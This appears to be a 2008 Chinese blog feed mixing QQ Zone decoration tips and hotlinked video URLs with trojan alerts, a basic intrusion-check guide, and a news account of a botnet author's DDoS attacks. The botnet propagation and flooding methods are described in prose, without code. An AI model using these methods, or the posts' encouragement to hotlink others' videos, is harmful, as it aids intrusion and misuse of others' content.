4、画面清晰,背景透明
5、是你装扮空间必备的装饰物。————为保证速度,以下FLV播放器演示中只有第一款加载了FLV播放。
  第一款: 专业版QQ空间万能FLV播放器

 
地址: http://i.qqywf.com/flv/player.swf?id=www.qqywf.com&flv=http://video-v1.9you.com/421b47ffd946ca083b65cd668c6b17e6/flv/x/b/xbkovs36e.flv&file=.swf
大小: 宽554,高340
 
地址中的蓝色部分即为.flv文件地址,可以更换为任意你想要播放的地址。
第二款: 迷你版QQ空间FLV播放器:可爱风格——专为女生设计制作。
 

 
地址: http://i.qqywf.com/flv/player_cute.swf?id=www.qqywf.com&flv=FLV文件地址&file=.swf
点击这里预览迷你可爱版播放器FLV播放效果
大小: 宽305,高296
第三款: 纯FLV播放器,无装饰及背景——适合需要自己用大图模块或者FD模块装饰的朋友用。
地址:http://img.qqywf.com/flv/player.swf?id=www.qqywf.com&flv=FLV文件地址
说明:1、这款QQ空间FLV播放器不限制大小,拉多大就显示多大。

2、这款播放器可以添加透明FLASH特效,方法就是在地址后面加上“&u=数字”,数字为1-209,详细对应的FLASH请查看:http://www.qqywf.com/showart/490.html 
  FLV文件大家可以去各大网站盗取,推荐去:v.9you.com 或者v.qq.com其他类视频网站多的是。至于盗FLV地址的方法,大家可以去百度搜索一下结果,最后送大家一些近期非常热门的FLV地址:
大家可以去QQvideo盗取FLV地址,很简单,去v.qq.com找到自己的喜欢的视频网页,看到网址如:http://video.qq.com/v1/videopl?v=3AMFCrMHeMz 。我们只需要“v=”后面的参数,那么对应的FLV地址就是: http://v.video.qq.com/44760293/4ia5x6zIs6x.flv 
http://mtvmusic.1ting.com/mvfiles//enjoyvideo/tz/lovesong.flv  lyyeee
http://vdn43.6rooms.com/bd/37/41cc462017168.flv  蔡妍 两个人
http://vdn43.6rooms.com/7d/72/245b1703587662.flv  李孝利--Rain
http://vdn43.6rooms.com/b3/db/ae56685213813.flv  10 Minutes 
http://vtc42.6rooms.com/e6/a0/2314342901277.flv  We Will Rock You
http://vdn43.6rooms.com/15/fc/96a6458034040.flv  lucky
http://vdn43.6rooms.com/85/96/c406867374208.flv  Alizee
http://video-v1.9you.com/421b47ffd946ca083b65cd668c6b17e6/flv/u/g/ugmzd801x.flv  韩国
http://mtvmusic.1ting.com/mvfiles//enjoyvideo/ttmp3/其它/skye_billys.flv  Billy S
http://video-v1.9you.com/421b47ffd946ca083b65cd668c6b17e6/flv/e/b/eb6kagg3b.flv  悱炷蓅
http://video-v1.9you.com/421b47ffd946ca083b65cd668c6b17e6/flv/6/c/6czdi79jf.flv  悱炷蓅1
http://mtvmusic.1ting.com/mvfiles//200507/binqibu_bg.flv  BoyGirls
http://mtvmusic.1ting.com/mvfiles//200505/jackson_es.flv  Earth Song 
http://mtvmusic.1ting.com/mvfiles/server/2007-4-29/7294.flv  laisla bo 
http://mtvmusic.1ting.com/mvfiles//enjoyvideo/ttmp/come-on.flv  Come On 
http://mtvmusic.1ting.com/mvfiles//enjoyvideo/ttmp/lonely.flv  Lonely  
http://mtvmusic.1ting.com/mvfiles/enjoyvideo/ttmp/bln_stronger.flv  Strongert
http://mtvmusic.1ting.com/mvfiles/enjoyvideo/ttmp/bln_pharell.flv  Phorell 
http://mtvmusic.1ting.com/mvfiles/enjoyvideo/dxmusic98mtv/britney_lucky.flv  "title="lucky 
http://mtvmusic.1ting.com/mvfiles/babyvox_ych1.flv  BabyV 
http://mtvmusic.1ting.com/mvfiles/enjoyvideo/ttmp/bln_sometimes.flv  So metimes
http://vdn43.6rooms.com/60/a9/eef.flv  qixi
http://mtvmusic.1ting.com/mvfiles/enjoyvideo/ttmp/britney_spears_oops_i_did_it_again.flv  Oops I Did t
http://video-v1.9you.com/421b47ffd946ca083b65cd668c6b17e6/flv/z/u/zuz70no6y.flv  欢迎动画
http://video-v1.9you.com/421b47ffd946ca083b65cd668c6b17e6/flv/g/h/ghxpdpyyx.flv  推荐非主流 
http://video-v1.9you.com/421b47ffd946ca083b65cd668c6b17e6/flv/2/0/20ofcb29h.flv  推荐非主流1 
http://video-v1.9you.com/421b47ffd946ca083b65cd668c6b17e6/flv/j/g/jglojdn8z.flv  推荐非主流2 
http://video-v1.9you.com/421b47ffd946ca083b65cd668c6b17e6/flv/e/b/eb6kagg3b.flv  推荐非主流3 
http://video-v1.9you.com/421b47ffd946ca083b65cd668c6b17e6/flv/8/m/8m009x0b6.flv  推荐非主流4 
http://video-v1.9you.com/421b47ffd946ca083b65cd668c6b17e6/flv/f/7/f7doilxre.flv  推荐非主流5 
http://video-v1.9you.com/421b47ffd946ca083b65cd668c6b17e6/flv/q/p/qpckxwqdr.flv  推荐非主流6 
http://video-v1.9you.com/421b47ffd946ca083b65cd668c6b17e6/flv/6/c/6czdi79jf.flv  推荐非主流7 
http://video-v1.9you.com/421b47ffd946ca083b65cd668c6b17e6/flv/3/z/3zekk6hil.flv  推荐非主流8 
http://video-v1.9you.com/421b47ffd946ca083b65cd668c6b17e6/flv/7/0/70ubk8e1b.flv  推荐非主流9 
http://video-v1.9you.com/421b47ffd946ca083b65cd668c6b17e6/flv/l/u/luqf6r5y8.flv  推荐非主流10 
http://video-v1.9you.com/421b47ffd946ca083b65cd668c6b17e6/flv/2/s/2srqvtwey.flv  推荐非主流11 
http://video-v1.9you.com/421b47ffd946ca083b65cd668c6b17e6/flv/4/s/4s05ny13y.flv  推荐非主流12 
http://video-v1.9you.com/421b47ffd946ca083b65cd668c6b17e6/flv/h/p/hp5ilh9er.flv  推荐非主流13 
http://video-v1.9you.com/421b47ffd946ca083b65cd668c6b17e6/flv/f/9/f96vfcgpi.flv  推荐非主流14 
http://video-v1.9you.com/421b47ffd946ca083b65cd668c6b17e6/flv/i/s/isnbt8ded.flv  推荐非主流15 
http://video-v1.9you.com/421b47ffd946ca083b65cd668c6b17e6/flv/s/a/sajykeqj6.flv  推荐非主流16 
http://video-v1.9you.com/421b47ffd946ca083b65cd668c6b17e6/flv/1/v/1v8htsd9p.flv  推荐非主流17]]> http://regsina.blog.163.com/blog/static/66827483200811647170 0 http://regsina.blog.163.com/blog/static/66827483200811647170 Sat, 16 Feb 2008 16:07:17 +0800 2008-02-16T16:07:17+08:00 <![CDATA[空间模块]]> http://regsina.blog.163.com/blog/static/66827483200811635350 http://qzone521.108.tofor.com/qzone201/gs1cmp.swf 
http://qingrenyizhan.cn/cmp1/cmp.swf 
http://www.56.com/ap6_58770299.swf 
http://www.56.com/ap8_58866051.swf 
http://www.cxqq.net/mp5/qq293061.swf
http://www.cxqq.net/]]> http://regsina.blog.163.com/blog/static/66827483200811635350 0 http://regsina.blog.163.com/blog/static/66827483200811635350 Sat, 16 Feb 2008 15:53:05 +0800 2008-02-16T15:53:05+08:00 <![CDATA[01月30号最新出品超酷的机械视觉空间友情连接专用QQ空间FD模版背景全透明!]]> http://regsina.blog.163.com/blog/static/66827483200811593190
3.0的空间是大图模块的天下,但是4.0的空间则是flash模块的世界 
因为4.0的空间主页可以添加透明flash,这样flash应用范围就更广了 
flash模块和大图模块添加的方法有所不同,大图模块是将空间日志,留言等版块全部放到大图上面, 
但是现在有了透明FD模版,可以将空间的默认版块放到FD模块的下面,这样既漂亮,又个性 
放版块的位置已经掏空了,位置怎么拿准,告诉大家一个技巧,点2下自定义 
就可以在看得到FLASH的模式下摆放东西很方便的哦!自己慢慢试试, 
相信你一定放的比我还准确,另外注意一点,一定将flash模块按照规定的尺寸拉到最大化, 
这样中间的版块位置才够大! 
要是还不懂的话那你可以点下面的连接查看教程
点击查看FD添加的图文教程
顺便再教大家一个简单的方法盗取别人空间的FD模版
点击查看获取别人空间的FD地址图文教程
FLASH大小:715*800
同时也欢迎大家加入残血的CLUB讨论技术
http://qq1688.qzone.qq.com/club
地址: http://www.cxqq.net/thread-47357-1-1.html
]]> http://regsina.blog.163.com/blog/static/66827483200811593190 0 http://regsina.blog.163.com/blog/static/66827483200811593190 Fri, 15 Feb 2008 21:31:09 +0800 2008-02-15T21:31:09+08:00 <![CDATA[01月20号超酷的友情连接机械QQ空间FD摸版出炉拉喜欢的快来拿哦!]]> http://regsina.blog.163.com/blog/static/668274832008115930510
3.0的空间是大图模块的天下,但是4.0的空间则是flash模块的世界 
因为4.0的空间主页可以添加透明flash,这样flash应 用范围就更广了 
flash模块和大图模块添加的方法有所不同,大图模块是将空间日志,留言等版块全部放到大图上面, 
但是现在有了透明FD模版,可以将空间的默认版块放到FD模块的下面, 这样既漂亮,又个性 
放版块的位置已经掏空了,位置怎么拿准,告诉大家一个技巧,点2下自定义 
就可以在看得到FLASH的模式下摆放东西很方便的哦!自己慢慢试试, 
相信你一定放 的比我还准确,另外注意一点,一定将flash模块按照规定的尺寸拉到最大化, 
这样中间的版块位置才够大! 
要是还不懂的话那你可以点下面的 连接查看教程 
点击查看FD添加的图文教程
顺便再教大家一个简单的方法盗取别人空间的FD模版
点击查看获取别人空间的FD地址图文教程 
FLASH大小:715*800
同时也欢迎大家加入残血的CLUB探讨技术
http://293061.qzone.qq.com/club
地址
http://www.cxqq.net/thread-45756-1-1.html
]]> http://regsina.blog.163.com/blog/static/668274832008115930510 0 http://regsina.blog.163.com/blog/static/668274832008115930510 Fri, 15 Feb 2008 21:30:51 +0800 2008-02-15T21:30:51+08:00 <![CDATA[1月17号超酷的机械时代QQ空间FD摸版出炉拉喜欢的快来拿哦!]]> http://regsina.blog.163.com/blog/static/668274832008115930360
3.0的空间是大图模块的天下,但是4.0的空间则是flash模块的世界 
因为4.0的空间主页可以添加透明flash,这样flash应 用范围就更广了 
flash模块和大图模块添加的方法有所不同,大图模块是将空间日志,留言等版块全部放到大图上面, 
但是现在有了透明FD模版,可以将空间的默认版块放到FD模块的下面, 这样既漂亮,又个性 
放版块的位置已经掏空了,位置怎么拿准,告诉大家一个技巧,点2下自定义 
就可以在看得到FLASH的模式下摆放东西很方便的哦!自己慢慢试试, 
相信你一定放 的比我还准确,另外注意一点,一定将flash模块按照规定的尺寸拉到最大化, 
这样中间的版块位置才够大! 
要是还不懂的话那你可以点下面的 连接查看教程
点击查看FD添加的图文教程
顺便再教大家一个简单的方法盗取别人空间的FD模版
点击查看获取别人空间的FD地址图文教程 
FLASH大小:715*800
同时也欢迎大家加入残血的CLUB探讨技术
http://293061.qzone.qq.com/club
地址:http://www.cxqq.net/thread-45111-1-1.html
]]> http://regsina.blog.163.com/blog/static/668274832008115930360 0 http://regsina.blog.163.com/blog/static/668274832008115930360 Fri, 15 Feb 2008 21:30:36 +0800 2008-02-15T21:30:36+08:00 <![CDATA[本人空间所有FD装扮送给大家希望大家喜欢!]]> http://regsina.blog.163.com/blog/static/668274832008115927500
http://bbs.cxqq.net/thread-44697-1-1.html
 
[QQ空间官方吧]【团队加入申请】残血家族申请成为官方外部家族团队!
http://qzone.qbar.qq.com/367064.htm


]]> http://regsina.blog.163.com/blog/static/668274832008115927500 0 http://regsina.blog.163.com/blog/static/668274832008115927500 Fri, 15 Feb 2008 21:27:50 +0800 2008-02-15T21:27:50+08:00 <![CDATA[黑色DOS频繁闪出 QQ盗号木马依然坚挺]]> http://regsina.blog.163.com/blog/static/66827483200811584070 节后病毒的爆发越来越严重,病毒像流感一样大肆传播。记者从金山毒霸方面获悉,QQ木马变种又有新的动向。 

    “闪屏感染者414632”(Win32.viking.sb.414632),这是一个感染型病毒。病毒成功运行后,会感染除系统盘外的所有磁盘中的exe文件,并在文件尾部附近添加感染标记,被感染的文件体积会增大,并且图标都变成安装程序的图标。文件一旦被感染,就将无法正常运行。 

    “QQ盗号木马112755”(Win32.PSWTroj.QQThiefT.ty.112755),该病毒是一个QQ盗号木马。该病毒运行后会生成注册表启动项,注入QQ进程盗取密码,并把盗取的密码发送到木马种植者指定的邮箱当中。 

    一、 “闪屏感染者414632”(Win32.viking.sb.414632) 威胁级别:★★ 

    病毒在用户系统中成功运行起来后,会在系统盘的当前用户临时文件目录“%Documents and Settings%\用户名\Local Settings\Temp\”下生成病毒文件update.exe,并释放出另一个.exe格式的病毒文件,不过,由于病毒作者的失误,该文件是破损的,无法对用户构成威胁。 

    虽然少了帮手,但update.exe文件依然可对系统进行破坏。它会搜索除系统盘之外的所有磁盘分区,将它们里面的EXE可执行文件全部感染。被感染的文件,其图标会变成安装程序的图标。如果用户用专门的软件检查这些文件,会发现它们体积有所增大,且尾部附近增加“fs207316ip0m”字符。这是病毒作的感染标记,为的是帮助病毒避免重复感染,提高病毒搞破坏的效率。 

    当文件被感染后,如果用户试图运行它们,屏幕上就会有一个黑色的DOS窗口一闪而过,而被感染的文件则运行失败。 

    二、“QQ盗号木马112755”(Win32.PSWTroj.QQThiefT.ty.112755) 威胁级别:★ 

    病毒进入用户的电脑系统后,在系统盘的%Program Files%\Internet Explorer\PLUGINS\目录下释放出病毒文件Sy_Win7k.Jmp和Wn_Sys8x.Sys,并修改注册表,把自己的相关信息加入启动项,使自己可以在用户以后每次开机时跟着系统自动跑起来。 

    释放出的两个病毒文件各有分工。Wn_Sys8x.Sys的任务是使病毒能随系统一同启动,而Sy_Win7k.Jmp则负责在启动成功后,搜索QQ即时聊天软件的进程。如果发现,就立刻注入其中,通过读取内存的方式盗取用户的QQ帐号信息。 

    如果能顺利得手,病毒就悄悄建立远程连接,将用户的QQ号和密码发送到木马种植者指定的邮箱中。一同被发送的还有被盗用户的Q币金额、QQ等级等相关信息。 

    木马种植者拿到用户的QQ帐号后,可能会将其卖掉或洗光Q币,也有可能利用该QQ号去诈骗被盗用户的好友。因此,如发现QQ号被盗,用户应立即通知腾讯和QQ好友,尽可能挽回损失。
]]> http://regsina.blog.163.com/blog/static/66827483200811584070 0 http://regsina.blog.163.com/blog/static/66827483200811584070 Fri, 15 Feb 2008 20:40:07 +0800 2008-02-15T20:40:07+08:00 <![CDATA[如何判断自己的系统是否安全!]]> http://regsina.blog.163.com/blog/static/668274832008115838280 第一:电脑刚开机连接网络的情况下,可以使用netstat -an命令判断系统安全。

一般情况下,刚开机应该不会有外部IP连接你电脑的;

开始菜单——运行——输入cmd——进入DOS——再输入:netstat -an

netstat命令是一个观察网络连接状态的实用工具。 

可能系统有一些程序会在刚开机的情况下与外部IP建立连接,比如:

系统升级打补丁、杀毒软件、防火墙、千千静听、讯雷等,当然这些也可以由你自己设置的,也可以通过防火墙限制这些程序是否访问网络,是否开机自动启动等。

如果刚开机的情况下,

开始菜单——运行——输入cmd——进入DOS——再输入:netstat -an

发现有外部IP连接你的电脑,除了正常的连接外,如果还有来历不明的IP,那你就要小心了;

您可以上www.ip138.com这个网站查询一下对方IP,看一下对方IP是哪里的,从而判断系统安全。

第二:可以通过系统进程判断系统安全,除了系统正常进程外,如果发现来历不明的进程,可以把这个进程名字去百度查一下资料,看这个进程是否是病毒木马。

(要学会利用百度等搜索引擎,百度就是你最好的老师。)

第三:系统服务

开始菜单——运行——输入msconfig

如图一:





隐藏所有 Microsoft 服务 打勾,如图二:





隐藏所有 Microsoft 服务 打勾,除了系统正常服务外,如果还有其它来历不明的服务你也要小心了,如果你不懂这个服务,你也可以把这个服务名字去百度查一下资料,看这个服务是否是病毒木马。

(要学会利用百度等搜索引擎,百度就是你最好的老师。)

第四:查看启动对像

开始菜单——运行——输入msconfig,当然也可以利用360等工具查看。



 

如果发现来历不明的启动项目,你也要注意了,你也可以把这个启动项目名字去百度查一下资料,看这个启动项目是否是病毒木马。

(要学会利用百度等搜索引擎,百度就是你最好的老师。)

第五:查看系统是否有隐藏帐号

“开始”→“运行”并输入"regedit.exe" 回车,启动注册表编辑器regedit.exe。 打开键:HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\这里查看一下你系统的用户,看有没有隐藏的帐号,前提是你需要有这个注册项的权限!

今天就说到这里吧,欢迎大家一起交流;

对于系统安全,如果大家有什么更好的方法来判断,也希望大家提出来,如果你说得正确,我将会根据具体情况奖励1——20华夏元宝!

由于时间原因,文章中难免有错误的地方,欢迎大家指正!

感谢大家长期以来对华夏黑客联盟的支持与厚爱!

祝愿大家2008年新年快乐!
]]> http://regsina.blog.163.com/blog/static/668274832008115838280 0 http://regsina.blog.163.com/blog/static/668274832008115838280 Fri, 15 Feb 2008 20:38:28 +0800 2008-02-15T20:38:28+08:00 <![CDATA[关于QQ和QQ盗号木马]]> http://regsina.blog.163.com/blog/static/668274832008115833240   Internet上的“木马”是一种病毒程序,这些小程序往往会附着在一些黑客工具软件上或其它软件上,很多网友由于好奇或者为了报复他人就去下载一些来路不明的炸弹、断线、猜密码等工具,这些东西有可能被人加了木马程序,当你正在享受炸别人黑别人的快感的时候殊不知埋伏在里面的木马已经偷偷潜伏在你的计算机里,只要里外一接应,你电脑中的一切都会毫无保留地奉献给别人,甚至木马的控制者在愿意的时候可以象烧掉特洛伊城一样破坏你的电脑。而且,一些新近流行的木马可能会更加另人难于防范,其隐蔽性在于它可以截获你所有的键盘输入,并将其保存结果定时发到指定地址的计算机或者发邮件到某个邮件地址,由于在键盘输入这第一步你的操作就被木马偷听到了,所以即使QQ本身做得再怎么安全也是无济于事了。
  QQ本身的保密性其实是很强的,只要网友在使用的时候多加防范,不要下载和使用来路不明的软件,你的QQ号码还是很安全的,当然我们也会不断完善QQ的密码机制,使得用户号码即使被盗也有相应的途径找回,比如现在申请QQ行或者会员都能使用手机取回密码,在最大程度上保护用户的利益不受损失。]]> http://regsina.blog.163.com/blog/static/668274832008115833240 0 http://regsina.blog.163.com/blog/static/668274832008115833240 Fri, 15 Feb 2008 20:33:24 +0800 2008-02-15T20:33:24+08:00 <![CDATA[《纸客帝国》送您史上最恶搞的QQ秀]]> http://regsina.blog.163.com/blog/static/668274832008115610140 在《纸客帝国》贺岁新版“长江7号”火爆上线的同时,趣味第一公司特别携手腾讯QQ,推出《纸客帝国》原创QQ秀大评选活动。只要参与活动就能得到趣味第一送出的史上最恶搞的QQ秀!同时还有机会获得最高1500Q币的超级大奖。
此次《纸客帝国》原创QQ秀大评选活动,将于2月1日炫目登场。如果您是《纸客帝国》的爱好者、如果您是QQ秀的爱好者,那就快到这里来展示您的原创力量吧!《纸客帝国》精彩的动漫内容就是您创作的灵感,此次活动就是您展示才艺的舞台,让您化身QQ秀设计大师。如果您的作品够出色、够个性它将有可能成为腾讯的QQ秀,为亿万QQ用户所选用。
不过需要特别注意的是:所有玩家在获奖后,都必须输入《纸客帝国》的游戏账号(该账号必须为激活了游戏大厅的有效账号)。中奖后经过系统进一步审核,《纸客帝国》账号为有效的,方可获取奖品,因此如果您现在还没有《纸客帝国》游戏账号,请点此链接申请[url=https://passport.qwd1.com/Register.aspx]https://passport.qwd1.com/Register.aspx[/url]。
无限秀色掌中出,万金寻觅创秀主。《纸客帝国》“原创QQ秀大评选活动”送您史上最恶搞的QQ秀,并有海量Q币等您来拿。具体活动规则如下:
  
活动时间
2008.2.1~2.19 作品上传期
在此期间玩家可以将自己设计的原创QQ秀上传到活动页面。
2008.2.20~3.2 投票评选期
所有上传作品正式接受玩家投票,每天将票数最高的作品进行首页展示。
2008.3.3统计获奖名单
统计参活动的获奖名单,并开始发奖。
活动规则
1、在规定时间内,玩家将原创QQ秀作品上传到指定的活动页面(QQ秀作品题材不限,当然内容最好符合《纸客帝国》的风格),按投票高低获得制作奖,同时所有参与上传和投票的玩家均有机会获得参与奖。
2、《纸客帝国》账号经审核为有效账号时,才会发放奖品(QQ秀奖品无需审核)。《纸客帝国》账号审核由趣味第一负责,QQ秀奖品发放由腾讯负责
3、如QQ账号因特殊原因无法获得奖品,则视为自动放弃。
4、同一账号不得重复领取同等级奖品
5、每个QQ账号只可上传一件作品,对同一件作品只可进行一次投票。
6、所有奖品将于活动结束后统一发放。
7、活动最终解释权归趣味第一公司和腾讯游戏频道。
奖项设置
1、得票最高的设计作品将被分别制作更新到腾讯QQ秀中,即QQ秀图片上将会显示设计者的名称
2、制作奖(名次按得票率的高低来定):
一等级(1个):奖励Q币1500个
二等级(9个):奖励Q币500个
三等级(40个):奖励Q币100个
此外,上传作品即可获奖:纸客帝国QQ秀一套
3、参与奖(所有参与投票的用户均有机会获奖,随机抽取):
一等级(50个):奖励Q币100个
二等级(100个):奖励Q币50个
三等级(200个):奖励Q币5个]]> http://regsina.blog.163.com/blog/static/668274832008115610140 0 http://regsina.blog.163.com/blog/static/668274832008115610140 Fri, 15 Feb 2008 18:10:14 +0800 2008-02-15T18:10:14+08:00 <![CDATA[一个计算机黑客的网络失足]]> http://regsina.blog.163.com/blog/static/668274832008114851180 自从Internet诞生以来,这个由各种数据和信息交织而成的网络编程为了一个大型的第二社会,很多人在网络中寻找到了自己新的生活方式,新的就业机会,新的人生态度,所有的一切都让得以接触网络的人群面向着一条虚拟世界的竞技场,然而网络的隔阂和数字的虚拟让犯罪者的心理也开始无所畏惧,于是网络在某些人的眼里成为了无法无天的代名词,他们认为,那里是他们的天下……   从玩火到纵火 
  徐立(化名),河北省唐山某钢铁公司设备机动处机加工分厂的一名普通工人,然而这个刚刚28岁的普通青年因为开发了BKDR-VB.CQ木马程序(文件名:ipxsrv.exe)构造“僵尸网络(Bot.net)”,并利用其实施DDoS攻击很可能成为中国网络发展史上第一个因为黑客及网络入侵而判刑的人。2005年2月3日被河北省唐山市路北区人民检察院依法以涉嫌破坏计算机信息系统罪批准逮捕,一副手铐结束了他网络无法无天的黑客生涯…… 
  徐立没有接受过专业的计算机学习,只是在钢铁公司附属的技校读过书,但是他幸运的从1999年就开始接触到了互联网,正是互联网改变了徐立的人生轨迹。在接触互联网的最初,徐立迅速被这样网络世界中丰富多彩的内容震撼了,他第一次看到了什么叫做网页,第一次接触到了远在天边的陌生网友,所有的这一切都让他感觉新奇和刺激,这个外表腼腆的小伙子渴望着来自网络的沟通,虽然他也仅仅是刚刚接触网络,但是他仍然清晰的感觉到,网络就为了他而生的。 
  接触网络不久,很快徐立就迷恋上了当时Windows 98中内嵌的一个聊天软件Chat,通过Chat他能够进入全世界各大聊天室,和来自全世界任何一个某个角落里的人无限制的沟通。“当时并没有QQ这种软件,而且ICQ在国内也不是很普及,最初的网民都是在IRC聊天室中认识,我就在燕赵信息港的聊天室中认识了很多网友。”但是网络攻击事件很快将徐立拖出了单纯聊天排解寂寞的目的,他很快就发现,在网络中的某些高手,只要看谁出言不慎就可以将其踢出聊天室,即便是在自己不是聊天室管理员的情况下也为所欲为。在多次被这些高手赶下舞台之后,徐立开始对这种Chat中踢人的技术产生兴趣,很快他就找到了这款能够在Chat中踢人的软件,在河北省燕赵信息港的Chat中小试身手。 
  “要知道那种网络攻击的成功给人的带来的不仅仅只有精神上的喜悦,那是一种无法形容的快感,于是我就开始对网络黑客技术产生了浓厚的感兴趣,特别是那种在Chat聊天室中风光的感觉。”然而徐立没有意识到,这种超越了现实中法律的约束,在虚拟世界中称王称霸的留恋感觉已经将他推上了黑暗的大门。1999年,徐立已经开始不再满足单纯的在聊天室里踢踢人,他开始开发自己的Chat聊天工具,他根据mIRC这款开源的IRC聊天工具基础上开发了自己的第一个Chat聊天软件“XL_BOT”。XL_BOT中他添加了一些诸如语言轰炸、自动回复、自动踢人等Bot的功能。由于这款工具在IRC聊天室中所显示的独特威力,很快风行一时,最终某省信息港的Chat聊天室因为Bot之类的攻击和其它原因最终被迫关闭。 
  什么是BOT?BOT就是ROBOT(机器人)的缩写,是一组用来自动管理IRC聊天室、辅助进行聊天、甚至进行搞笑的程序。例如,大家可能都在聊天室里看到过某些人能够每次都打出不同的彩色文字、或者某人因为一说脏话就被踢出的情景吧?这就是用到了BOT。很多IRC客户端软件都提供了编写BOT的功能,例如Microsoft Chat、Pirch、mIRC.等 
  信息港Chat的关闭并没有让徐立的行为得到遏制,相反他开始在全国各个IRC聊天室中兴风作浪,当在某个聊天室中遇到强敌的时候,他就会想尽方法的向强敌发起挑战,为此他还专门自学了大量VB编程的知识,并根据国外一些IRC踢人工具开发了自己的第一个真正的黑客程序“Script.exe”。这款黑客工具通过扫描网络中的IP段寻找到被植入Subsever木马的计算机用户,然后再利用Subseven自身的弱点,让这些带有木马的用户的计算机自动将Script.exe的服务端下载到计算机中执行,在掌握了大量的计算机后,徐立可以通过控制所有被入侵的计算机一起想IRC聊天室的服务器进行攻击,从而达到将聊天室的所有网友“轰炸”下线的目的。由于这款工具的威力和攻击力非常强,一时间在全国甚至世界一些著名的IRC服务器危害一时。但是徐立不但没有感觉到自己在玩火,而是从某些网友的“钦佩”与赞许中得到了来自网络中更多的快感,这时的徐立认为,在网络中,至少在IRC这片天空中,他已经成为了当之无愧的“王者”。 
2000年,徐立已经不再满足去别的IRC聊天室中捣乱,为了提高自己在IRC放面的技术和知识,他开始自己租用服务器搭建自己的IRC聊天室,在搭设服务器的过程中,徐立也经受了各种网络攻击,多样的攻击方式让徐立学到了大量的网络攻击知识,徐立并没有因为自己建设IRC聊天室而将精力花在去研究如何防范网络攻击的技术,他却相反的将自己所有见到的攻击方式重新整理并编写出了Script.exe攻击软件的升级版本Msapp,这个程序大大提高了对IRC服务器的功能能力,它能够通过IRC服务器本身发放被病毒感染的垃圾数据包,并且可以通过指令让用户到指定的地址下载文件,随后Msapp迅速通过Kuangz这个后门软件为感染源,采用了与Script同样的手段感染那些已经感染了Kuangz后门的计算机,由于程序的攻击性大增,徐立在自己最高峰的时候控制了将近一万台各种计算机。随后徐立又不断的完善Msapp的攻击能力,在程序中还加入了IPC共享扫描、自动植入功能,让受害用户突破将近三万人。 
  此时的徐立虽然找到了一份想当稳定的音乐下载网站网管员工作,但是为了虚拟的快感他已经全然不会在估计任何后果,“因为在我看来,网络IRC中几乎没有能够和我抗衡的对手了。”自信膨胀徐立随后又针对Windows NT/2000/Xp系统服务启动方式将Msapp.exe程序去掉Ipc共享漏洞扫描繁殖功能升级为Rasinf.exe程序,还利用大量感染Rasinf.exe程序的计算机对著名的甲骨文公司的Web服务进行了10分钟的攻击测试,致使其停止了服务。技术让徐立充满了自信,他深信自己就是网络中的游侠,四处烧杀闯荡网络这个没有法律的虚拟江湖。 
  2004年冲击波、振荡波接连袭击全球,国内诸多公司也愈加的开始重视网络安全,恶意的网络入侵和网络攻击更是被法律定性为了刑事犯罪,徐立开始担心自己会失去网络管理员的工作,于是为了达到提高自己网站的访问量等诸多目的,徐立再一次改进了Rasinf木马病毒,他不仅仅重写了全部的程序代码,更将下载文件、发起拒绝服务攻击、终止主机进程、搜集主机系统信息、自身升级等功能威力更大的攻击方式添加到了病毒中,并将这款新的威力强大的木马病毒命名为Ipxsrv(杀毒软件公司将其称为僵尸病毒)。2004年6月份,徐立将编写完成的僵尸木马病毒通过托管在网通唐山公司的服务器上开始进行大面积散播,根据检查部门保守统计,仅仅半年时间,僵尸木马病毒已经传染了计算机将近四万多台。 
  “我在当时已经掌握了很多傀儡机了,每天都由几万台计算机可以由我操控发动网络攻击,也就是在这个时候我开始尝试性的攻击与我们开展同样业务的公司的服务器。”在程序测试阶段,徐立先后对国内几家知名的门户网站的音乐下载站点进行攻击,取得了不小的战果,随后徐立将自己的第一个真正的目标所定在一家在大陆的外资公司的服务器,这家公司与徐立的所在公司开展着同样的网络音乐下载业务,而且人气想当火爆。“他们网站的人气很旺,如果能够把他们消灭掉,那么我们网站很可能新多出大量的分流出来的注册用户。”为了这个目的徐立开始了自己第一次系统策划的网络攻击。 
  “我最初先是利用僵尸木马病毒中中所设计的TCP、TCPD、PORT、HTTP和URL等命令,强性大流量的攻击改网站的Web服务栏目首页、DNS域名解析服务器、网站首页、客户端登陆页面等。我开始就是想让他们没有新用户注册了,让他们公司的网站注册功能瘫痪,但是让我恼火的是他们没有多久就安装了网络防火墙,并停止了一些多余的服务,这样我攻击他Web页面的成功率就大大下降了。”不过徐立并没有就此罢手,“在我看来他们添加防范设备就是在藐视我的技术能力,所以我又开始针对他们的音乐下载软件端口进行攻击,而且采用了新的攻击手段,我就是想告诉他们,这种防范更能够刺激我旺盛的斗志。”于是接下来的一段时期徐立又开始使用TCP Sync Flood和UDP Flood等多种攻击类型对这家网站的音乐下载服务端口发动了DDoS洪水攻击。 
  由于每天几万台的洪水攻击,该公司的网站很快就陷入了瘫痪,为了和黑客对抗,该公司甚至邀请了国内外许多知名的安全公司来与徐立对抗,并在无奈的情况下升级了音乐下载软件的许多功能,但是由于该网站软件端口自身的友善性被徐立利用而致使该网站始终无法提供稳定服务,仍然无法回复正常工作。国内一位安全专家在谈到这件事情的时候说:“虽然他的攻击手段和攻击方式非常原始,但是像这样的洪水攻击至今在世界上都没有很好的办法,包括Yahoo等国外的大公司,在遭到巨大的洪水攻击的时候,也会很无奈。” 
  “我们除了采用设备防堵之外,也寻找到了国内外相关专家协助,我们甚至将服务器扩充、上传下在的流量进行负载均衡的分散、网站软件改版、服务器分布架构变更等一系列措施。但他针对我们网站的攻击并无固定时间段和固定攻击方式,所以上述举措都无法防御这种针对性不强但很有目的洪水攻击。最终我们的网站彻底瘫痪,无法提供正常服务,不算防御的损失,仅仅下载业务就损失数百万元。”
依靠道德还是法律? 

  1998年中国的网络安全事件几乎为0,在随后的几年里,伴随着Internet浪潮对全民的洗礼,黑客攻击事件开始直线上升。不过值得我们注意的是中国网络攻击事件的逐年增多似乎是一种包裹着“民族感和侠义”的畸形产物。从最早的绿色兵团攻击印尼网站到中国红客攻击美国网站,网民大众似乎将到处发动网络攻击,挤占宝贵网络资源,破坏网络设置的黑客当作了心目中的英雄,当作了为民族生张正义的勇士。于是在中国的红色网络中,一时间各种红客黑客网站纷纷打着或正义或民族的口号办着网络这个自由国度所最不耻勾当。 
